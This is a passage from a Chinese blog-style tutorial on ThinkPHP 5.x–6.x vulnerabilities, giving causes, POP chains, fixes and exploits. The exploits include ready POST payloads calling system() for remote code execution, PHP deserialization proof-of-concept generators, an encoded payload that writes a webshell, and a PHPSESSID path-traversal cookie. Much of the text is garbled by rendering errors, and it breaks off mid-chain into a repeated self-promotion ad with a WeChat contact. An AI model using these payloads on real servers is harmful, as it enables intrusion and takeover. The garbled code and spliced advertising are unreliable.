5.1.x:thinkphp/library/think/route/dispatch/Url.php 类的 parseUrl 方法,解析控制器后加上过滤
5.0.x:thinkphp/library/think/App.php 类的 module 方法的获取控制器的代码后面加上过滤
if (!preg_match(‘/1(\w|.)*$/’, $controller)) {
throw new HttpException(404, ‘controller not exists:’ . $controller);
}
10、ThinkPHP5 rce3
漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30。
漏洞成因:
ThinkPHP 底层没有对控制器名进行很好的合法性校验,在没有开启强制路由情况下,可以使用路由兼容模式 s 参数,用户可以通过此参数调用任意类的任意方法,最终导致远程代码执行漏洞的产生。同时,用户可以通 $_POST 数组传递请求方法 $method 的值,而且在获取之后没有进行任何检查,thinkphp直接把它作为 Request 类的方法进行调用,相当于可以随意调用 Request 类的部分方法。同时,Request 类的 __construct 方法中存在类属性覆盖的功能。
1)当框架在配置文件中开启了 debug 模式( ‘app_debug’=> true )
程序会调用 Request 类的 param 方法,因此可以覆盖原来的方法,转而调用Request::input(),进而调用call_user_func()函数。
攻击链:
payload => _ P O S T = > R e q u e s t : : \_POST => Request:: _POST=>Request::method => Request::param() =>
Request::method() => Request::server() =>
Request::input() => filterValue() => call_user_func() => rce
2)为开启 debug 模式
在 Dispatch 类的 run 方法中,会执行一个 exec 方法,当该方法中的 d i s p a t c h [ ′ t y p e ′ ] 等于 c o n t r o l l e r 或者 m e t h o d 时,又会调用 R e q u e s t 类的 p a r a m 方法。 dispatch['type'] 等于 controller 或者 method 时,又会调用 Request 类的 param 方法。 dispatch[′type′]等于controller或者method时,又会调用Request类的param方法。dispatch[‘type’] 来源于 parseRule 方法中的 $result 变量,而 $result 变量又与 $route 变量有关系, $route 变量取决于程序中定义的路由地址方式,GET方式中存在一条路由,可以利用这一路由地址,使得 $dispatch[‘type’] 等于 method ,从而完成 远程代码执行漏洞。
路由方式:‘\完整的命名空间类@动态方法’
\think\Route::get(‘captcha/[:id]’, “\think\captcha\CaptchaController@index”)
攻击链:
payload => $_GET => $route => Route::parseRule(…, $result, …) =>
Dispatch::run() => exec( d i s p a t c h e [ ′ t y p e ′ ] , . . . ) = > R e q u e s t : : dispatche['type'], ...) => Request:: dispatche[′type′],...)=>Request::method =>
Request::param() => Request::method() => Request::server() =>
Request::input() => filterValue() => call_user_func() => rce
漏洞利用:
ThinkPHP <= 5.0.13
POST /?s=index/index
s=whoami&_method=__construct&method=&filter[]=system
ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al
ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha
POST /?s=xxx HTTP/1.1
…
_method=__construct&filter[]=system&method=get&get[]=ls±al
或
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
漏洞修复:同上,同时限制Request中可控的请求方法
11、ThinkPHP 5.0.X 反序列化漏洞
漏洞成因:
\think\cache\driver\File::set() 方法可以写入文件,且文件名及文件内容可控,导致可以写入webshell。
在 think\process\pipes\Windows 类的 __destruct 方法中,存在一个删除文件功能,此处的文件名 $filename 变量是可控。若将一个类赋值给 f i l e n a m e 变量,则在 f i l e _ e x i s t s ( filename 变量,则在 file\_exists( filename变量,则在file_exists(filename) 的时候,会触发这个类的 __toString 方法。因为 file_exists 函数需要的是一个字符串类型的参数,如果传入一个对象,就会先调用该类 __toString 方法,将其转换成字符串,然后再判断。Output 类中,__call 方法内存在 call_user_func_array 函数,通过调用不存在的方法,即可触发 __call 方法,调用 call_user_func_array(array (任意类,任意方法), $args),执行任意方法,据此可以调用写文件的函数。
getCacheKey() 方法中的 $this->options[‘path’] 可控,因此 $filename 可控,可以利用伪协议绕过添加的exit。setTagItem 方法会再执行一次 set 方法,且文件内容 $value 通过 $name(文件名)赋值,可以在文件名中写入 webshell,进而写入 php 文件。
php://filter/write=string.rot13/resource=./<?cuc cucvasb();?>
POP链:
think\process\pipes\Windows::__destruct() =>
Windows::removeFiles() => file_exists() =>
Model::toJson() => Model::toArray() =>
Loader::parseName() => t h i s − > this-> this−>relation() =>
think\Model::getError() => getRelationData() =>
$value => i t e m [ item[ item[key] = $value ? v a l u e − > g e t A t t r ( value->getAttr( value−>getAttr(attr) : null //进行判断时,需要通过toArray()将getAttr($attr)进行数据类型转换,Output类中不存在toArray()方法,触发 think\console\Output::__call()调用不存在的方法
=> think\console\Output::__call()=>
call_user_func_array(array(任意类,任意方法),$args) =>
$this->handle->write() => think\console\Output::write() =>
think\session\driver\Memcached::write() => think\cache\driver\File:set() =>
File::setTagItem($name) => File::set() => file_put_contents() => 写入 webshell
漏洞利用:
webshell 的写入路径为:网站根目录 /public/static/<?cuc cucvasb();?>md5(‘tag_’+md5($tag)),访问 webshell 时要对文件名进行 URL 编码
Poc:
<?php //File类 namespace think\cache\driver; class File { // tag变量跟文件名有关 protected $tag='abcdef'; protected $options = [ 'expire' => 3600, 'cache_subdir' => false, 'prefix' => '', // 写入文件 'path' => 'php://filter/write=string.rot13/resource=./static/<?cuc cucvasb();?>',// 创建子目录
/* ‘path’ => ‘./static/3a6c45/’, */
‘data_compress’ => false,
];
}
//Memcached类
namespace think\session\driver;
use think\cache\driver\File;
class Memcached {
protected $handler = null;
function __construct() {
$this->handler=new File();
}
}
//Output类
namespace think\console;
use think\session\driver\Memcached;
class Output {
protected $styles = [‘removeWhereField’];
private $handle = null;
function __construct() {
$this->handle=new Memcached();
}
}
//HasOne类
namespace think\model\relation;
use think\console\Output;
class HasOne {
protected $query = false;
function __construct() {
$this->query=new Output();
}
}
//Pivot类
namespace think\model;
use think\model\relation\HasOne;
class Pivot {
protected $append = [‘getError’];
protected $error = false;
public function __construct() {
$this->error=new HasOne();
}
}
//Windows类
namespace think\process\pipes;
use think\model\Pivot;
class Windows {
private $files = [];
public function __construct() {
$this->files=[new Pivot()];
}
}
x = n e w W i n d o w s ( ) ; e c h o s t r r e p l a c e ( ′ + ′ , ′ x=new Windows(); echo str_replace('+', '%20', urlencode(serialize( x=newWindows();echostrreplace(′+′,′x)));
// 生成的payload:
O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00tag%22%3Bs%3A6%3A%22abcdef%22%3Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.rot13%2Fresource%3D.%2Fstatic%2F%3C%3Fcuc%20cucvasb%28%29%3B%3F%3E%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7D%7D%7D%7D%7D%7D%7D%7D
漏洞修复:
1)修改removeFiles方法
private function removeFiles(){
foreach ($this->files as KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ if(is_object(filename)){
continue;
}
if (file_exists(KaTeX parse error: Expected '}', got 'EOF' at end of input: …me)) { @unlink(filename);
}
}
$this->files = [];
}
2)在Windows.php中添加两个方法
public function __sleep(){
throw new Exception('Cannot serialize '.CLASS);
}
public function __wakeup(){
throw new Exception('Cannot unserialize '.CLASS);
}
12、ThinkPHP5.1.X反序列化命令执行漏洞
漏洞成因:
此漏洞的 pop 链入口类似于 5.0.x 反序列化漏洞的 pop 链入口,都是通过\think\process\pipes\Windows::__destruct()。Request 类中的 input 方法,调用了call_user_func(),可以通过构造 pop 链进行 rce。
POP链:
\think\process\pipes\Windows::__destruct() =>
Windows::removeFile() =>
file_exists() =>
Model::__toString() =>
Model::toJson =>
Model::toArray() =>
\think\Request::__call() =>
call_user_func_array() =>
Request::isAjax() =>
Request::param => Request::input() => Request::filterValue() => call_user_func() => rce
POC:
<?php namespace think; abstract class Model{ protected $append = []; private $data = []; function __construct(){ $this->append = ["lin"=>["calc.exe","calc"]]; $this->data = ["lin"=>new Request()]; } } class Request{ protected $hook = []; protected $filter = "system"; protected $config = [ // 表单ajax伪装变量 'var_ajax' => '_ajax', ]; function __construct(){ $this->filter = "system"; $this->config = ["var_ajax"=>'lin']; $this->hook = ["visible"=>[$this,"isAjax"]]; } } namespace think\process\pipes; use think\model\concern\Conversion; use think\model\Pivot; class Windows{ private $files = []; public function __construct() { $this->files=[new Pivot()]; } } namespace think\model; use think\Model; class Pivot extends Model{} use think\process\pipes\Windows; echo base64_encode(serialize(new Windows()));?>漏洞修复:
1)同上
2)使用 PHP7 新增的 unserialize 的过滤器,它通过白名单的方式来防止潜在的代码注入,将除 MyClass 和 MyClass2 和 stdClass 之外的所有对象都转换为 __PHP_Incomplete_Class 对象,从而阻断反序列化的漏洞利用链
13、ThinkPHP5.2.X反序列化命令执行漏洞
漏洞成因:
5.1 版本中的反序列化漏洞构造,__call 之前的方法仍然可以使用。5.2 版本的 think\model\concern\Attribute 类中的 getValue方法中存在一个可控的动态函数调用的点 c l o s u r e ( closure( closure(value, $this->data),只要让 $closure=‘system’ 并且 $value=‘要执行的命令’ ,就可以触发命令执行。
通过触发__destruct()方法中的removeFiles(),该函数内用了一个file_exists()方法处理对象实例时会当成字符串,从而触发__toString(),调用toJson() => toArray() => getAttr(),最后在getValue()处调用动态函数导致命令执行。
POP链:
think\process\pipes\Windows::__destruct() =>
think\process\pipes\Windows::removeFiles() =>
think\model\concern\Conversion::__toString() =>
think\model\concern\Conversion::toJson() =>
think\model\concern\Conversion::toArray() =>
think\model\concern\Attribute::getAttr() =>
think\model\concern\Attribute::getValue() =>
c l o s u r e ( closure( closure(value, $this->data) => system(‘command’, $this-data)
POC :
<?php namespace think\process\pipes { class Windows { private $files; public function __construct($files) { $this->files = [$files]; } } } namespace think\model\concern { trait Conversion {} trait Attribute { private $data; private $withAttr = ["lin" => "system"]; public function get() { $this->data = ["lin" => "ls"]; } } } namespace think { abstract class Model { use model\concern\Attribute; use model\concern\Conversion; } } namespace think\model{ use think\Model; class Pivot extends Model { public function __construct(){ $this->get(); } } } namespace { $conver = new think\model\Pivot(); $payload = new think\process\pipes\Windows($conver); echo urlencode(serialize($payload)); } ?>漏洞修复:同上
14、thinkphp 6 任意文件创建漏洞
漏洞成因:
session 文件默认存储在 /var/www/html/tp60/runtime/session 下,其文件名格式类似 sess_PHPSESSID 。而当我们在 PHPSESSID 中插入特殊字符时,程序还是能正常生成对应文件。因此,这里存在任意文件创建漏洞,且通过插入路径穿越符,还存在文件覆盖和getshell的可能。
在 session 初始化时,程序会将 PHPSESSID 对应的值赋值给 \think\session\Store:id 。当 PHPSESSID 对应值长度等于32,则无任何过滤直接赋值。然后在程序构造响应数据返回给用户时,会先将 session 写入文件,而这个文件的文件名则由之前的 PHPSESSID 拼接而成。由于没有任何的过滤,这也就造成了任意文件创建、覆盖。
漏洞利用:
在 浏览器 console下执行poc,\runtime\session文件夹下就会生成php文件:
document.cookie=“PHPSESSID=/…/…/…/public/demo.php”;
漏洞修复:对 session 的判断以及写入做拦截与效验,不允许直接 .php文件的 session 值写入
15、ThinkPHP6.X 反序列化命令执行漏洞
漏洞成因:
Model类中的checkAllowFields() 方法存在可控变量拼接的问题,可以调用 __toString(),融合 5 版本的 rce pop 链 即可构造此版本的 rce。
POP链:
Model::__destruct() =>
Model::save() =>
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
写在最后
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。
需要完整版PDF学习资源私我
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
[外链图片转存中…(img-tki35JWq-1712719817281)]
写在最后
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。
需要完整版PDF学习资源私我
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-A27DoYI9-1712719817282)]
A-Za-z ↩︎
416
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
